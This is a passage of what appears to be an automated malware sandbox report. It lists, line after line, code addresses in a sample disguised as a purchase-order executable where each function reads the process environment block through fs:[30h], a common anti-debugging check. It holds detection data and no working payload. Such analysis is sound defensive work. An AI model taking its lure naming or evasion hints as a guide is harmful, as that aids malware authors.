              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov ecx, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov eax, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov eax, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov ecx, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov eax, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov ecx, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01050115 mov eax, dword ptr fs:[00000030h]0_2_01050115
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F980E9 mov eax, dword ptr fs:[00000030h]0_2_00F980E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8A0E3 mov ecx, dword ptr fs:[00000030h]0_2_00F8A0E3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103A118 mov ecx, dword ptr fs:[00000030h]0_2_0103A118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103A118 mov eax, dword ptr fs:[00000030h]0_2_0103A118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103A118 mov eax, dword ptr fs:[00000030h]0_2_0103A118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103A118 mov eax, dword ptr fs:[00000030h]0_2_0103A118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01024144 mov eax, dword ptr fs:[00000030h]0_2_01024144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01024144 mov eax, dword ptr fs:[00000030h]0_2_01024144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01024144 mov ecx, dword ptr fs:[00000030h]0_2_01024144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01024144 mov eax, dword ptr fs:[00000030h]0_2_01024144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01024144 mov eax, dword ptr fs:[00000030h]0_2_01024144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01028158 mov eax, dword ptr fs:[00000030h]0_2_01028158
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9208A mov eax, dword ptr fs:[00000030h]0_2_00F9208A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01034180 mov eax, dword ptr fs:[00000030h]0_2_01034180
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01034180 mov eax, dword ptr fs:[00000030h]0_2_01034180
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBC073 mov eax, dword ptr fs:[00000030h]0_2_00FBC073
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104C188 mov eax, dword ptr fs:[00000030h]0_2_0104C188
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104C188 mov eax, dword ptr fs:[00000030h]0_2_0104C188
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101019F mov eax, dword ptr fs:[00000030h]0_2_0101019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101019F mov eax, dword ptr fs:[00000030h]0_2_0101019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101019F mov eax, dword ptr fs:[00000030h]0_2_0101019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101019F mov eax, dword ptr fs:[00000030h]0_2_0101019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F92050 mov eax, dword ptr fs:[00000030h]0_2_00F92050
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010561C3 mov eax, dword ptr fs:[00000030h]0_2_010561C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010561C3 mov eax, dword ptr fs:[00000030h]0_2_010561C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E1D0 mov eax, dword ptr fs:[00000030h]0_2_0100E1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E1D0 mov eax, dword ptr fs:[00000030h]0_2_0100E1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0100E1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E1D0 mov eax, dword ptr fs:[00000030h]0_2_0100E1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E1D0 mov eax, dword ptr fs:[00000030h]0_2_0100E1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8A020 mov eax, dword ptr fs:[00000030h]0_2_00F8A020
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8C020 mov eax, dword ptr fs:[00000030h]0_2_00F8C020
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010661E5 mov eax, dword ptr fs:[00000030h]0_2_010661E5
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE016 mov eax, dword ptr fs:[00000030h]0_2_00FAE016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE016 mov eax, dword ptr fs:[00000030h]0_2_00FAE016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE016 mov eax, dword ptr fs:[00000030h]0_2_00FAE016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE016 mov eax, dword ptr fs:[00000030h]0_2_00FAE016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01014000 mov ecx, dword ptr fs:[00000030h]0_2_01014000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01032000 mov eax, dword ptr fs:[00000030h]0_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC01F8 mov eax, dword ptr fs:[00000030h]0_2_00FC01F8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01026030 mov eax, dword ptr fs:[00000030h]0_2_01026030
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016050 mov eax, dword ptr fs:[00000030h]0_2_01016050
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8A197 mov eax, dword ptr fs:[00000030h]0_2_00F8A197
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8A197 mov eax, dword ptr fs:[00000030h]0_2_00F8A197
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8A197 mov eax, dword ptr fs:[00000030h]0_2_00F8A197
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD0185 mov eax, dword ptr fs:[00000030h]0_2_00FD0185
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010280A8 mov eax, dword ptr fs:[00000030h]0_2_010280A8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96154 mov eax, dword ptr fs:[00000030h]0_2_00F96154
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96154 mov eax, dword ptr fs:[00000030h]0_2_00F96154
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8C156 mov eax, dword ptr fs:[00000030h]0_2_00F8C156
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010560B8 mov eax, dword ptr fs:[00000030h]0_2_010560B8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010560B8 mov ecx, dword ptr fs:[00000030h]0_2_010560B8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC0124 mov eax, dword ptr fs:[00000030h]0_2_00FC0124
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010120DE mov eax, dword ptr fs:[00000030h]0_2_010120DE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010160E0 mov eax, dword ptr fs:[00000030h]0_2_010160E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA02E1 mov eax, dword ptr fs:[00000030h]0_2_00FA02E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA02E1 mov eax, dword ptr fs:[00000030h]0_2_00FA02E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA02E1 mov eax, dword ptr fs:[00000030h]0_2_00FA02E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]0_2_00F9A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]0_2_00F9A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]0_2_00F9A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]0_2_00F9A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]0_2_00F9A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01012349 mov eax, dword ptr fs:[00000030h]0_2_01012349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01038350 mov ecx, dword ptr fs:[00000030h]0_2_01038350
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105A352 mov eax, dword ptr fs:[00000030h]0_2_0105A352
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA02A0 mov eax, dword ptr fs:[00000030h]0_2_00FA02A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA02A0 mov eax, dword ptr fs:[00000030h]0_2_00FA02A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101035C mov eax, dword ptr fs:[00000030h]0_2_0101035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101035C mov eax, dword ptr fs:[00000030h]0_2_0101035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101035C mov eax, dword ptr fs:[00000030h]0_2_0101035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101035C mov ecx, dword ptr fs:[00000030h]0_2_0101035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101035C mov eax, dword ptr fs:[00000030h]0_2_0101035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101035C mov eax, dword ptr fs:[00000030h]0_2_0101035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE284 mov eax, dword ptr fs:[00000030h]0_2_00FCE284
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE284 mov eax, dword ptr fs:[00000030h]0_2_00FCE284
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103437C mov eax, dword ptr fs:[00000030h]0_2_0103437C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8826B mov eax, dword ptr fs:[00000030h]0_2_00F8826B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94260 mov eax, dword ptr fs:[00000030h]0_2_00F94260
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94260 mov eax, dword ptr fs:[00000030h]0_2_00F94260
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94260 mov eax, dword ptr fs:[00000030h]0_2_00F94260
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F96259 mov eax, dword ptr fs:[00000030h]0_2_00F96259
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8A250 mov eax, dword ptr fs:[00000030h]0_2_00F8A250
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010163C0 mov eax, dword ptr fs:[00000030h]0_2_010163C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8823B mov eax, dword ptr fs:[00000030h]0_2_00F8823B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104C3CD mov eax, dword ptr fs:[00000030h]0_2_0104C3CD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010343D4 mov eax, dword ptr fs:[00000030h]0_2_010343D4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010343D4 mov eax, dword ptr fs:[00000030h]0_2_010343D4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E3DB mov eax, dword ptr fs:[00000030h]0_2_0103E3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E3DB mov eax, dword ptr fs:[00000030h]0_2_0103E3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E3DB mov ecx, dword ptr fs:[00000030h]0_2_0103E3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E3DB mov eax, dword ptr fs:[00000030h]0_2_0103E3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC63FF mov eax, dword ptr fs:[00000030h]0_2_00FC63FF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]0_2_00FAE3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]0_2_00FAE3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]0_2_00FAE3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA03E9 mov eax, dword ptr fs:[00000030h]0_2_00FA03E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F983C0 mov eax, dword ptr fs:[00000030h]0_2_00F983C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F983C0 mov eax, dword ptr fs:[00000030h]0_2_00F983C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F983C0 mov eax, dword ptr fs:[00000030h]0_2_00F983C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F983C0 mov eax, dword ptr fs:[00000030h]0_2_00F983C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]0_2_00F9A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]0_2_00F9A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]0_2_00F9A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]0_2_00F9A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]0_2_00F9A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]0_2_00F9A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01018243 mov eax, dword ptr fs:[00000030h]0_2_01018243
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01018243 mov ecx, dword ptr fs:[00000030h]0_2_01018243
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104A250 mov eax, dword ptr fs:[00000030h]0_2_0104A250
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104A250 mov eax, dword ptr fs:[00000030h]0_2_0104A250
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F88397 mov eax, dword ptr fs:[00000030h]0_2_00F88397
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F88397 mov eax, dword ptr fs:[00000030h]0_2_00F88397
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F88397 mov eax, dword ptr fs:[00000030h]0_2_00F88397
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040274 mov eax, dword ptr fs:[00000030h]0_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E388 mov eax, dword ptr fs:[00000030h]0_2_00F8E388
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E388 mov eax, dword ptr fs:[00000030h]0_2_00F8E388
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E388 mov eax, dword ptr fs:[00000030h]0_2_00F8E388
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB438F mov eax, dword ptr fs:[00000030h]0_2_00FB438F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB438F mov eax, dword ptr fs:[00000030h]0_2_00FB438F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01010283 mov eax, dword ptr fs:[00000030h]0_2_01010283
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01010283 mov eax, dword ptr fs:[00000030h]0_2_01010283
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01010283 mov eax, dword ptr fs:[00000030h]0_2_01010283
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010262A0 mov eax, dword ptr fs:[00000030h]0_2_010262A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010262A0 mov ecx, dword ptr fs:[00000030h]0_2_010262A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010262A0 mov eax, dword ptr fs:[00000030h]0_2_010262A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010262A0 mov eax, dword ptr fs:[00000030h]0_2_010262A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010262A0 mov eax, dword ptr fs:[00000030h]0_2_010262A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010262A0 mov eax, dword ptr fs:[00000030h]0_2_010262A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8C310 mov ecx, dword ptr fs:[00000030h]0_2_00F8C310
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB0310 mov ecx, dword ptr fs:[00000030h]0_2_00FB0310
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA30B mov eax, dword ptr fs:[00000030h]0_2_00FCA30B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA30B mov eax, dword ptr fs:[00000030h]0_2_00FCA30B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA30B mov eax, dword ptr fs:[00000030h]0_2_00FCA30B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01026500 mov eax, dword ptr fs:[00000030h]0_2_01026500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064500 mov eax, dword ptr fs:[00000030h]0_2_01064500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064500 mov eax, dword ptr fs:[00000030h]0_2_01064500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064500 mov eax, dword ptr fs:[00000030h]0_2_01064500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064500 mov eax, dword ptr fs:[00000030h]0_2_01064500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064500 mov eax, dword ptr fs:[00000030h]0_2_01064500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064500 mov eax, dword ptr fs:[00000030h]0_2_01064500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01064500 mov eax, dword ptr fs:[00000030h]0_2_01064500
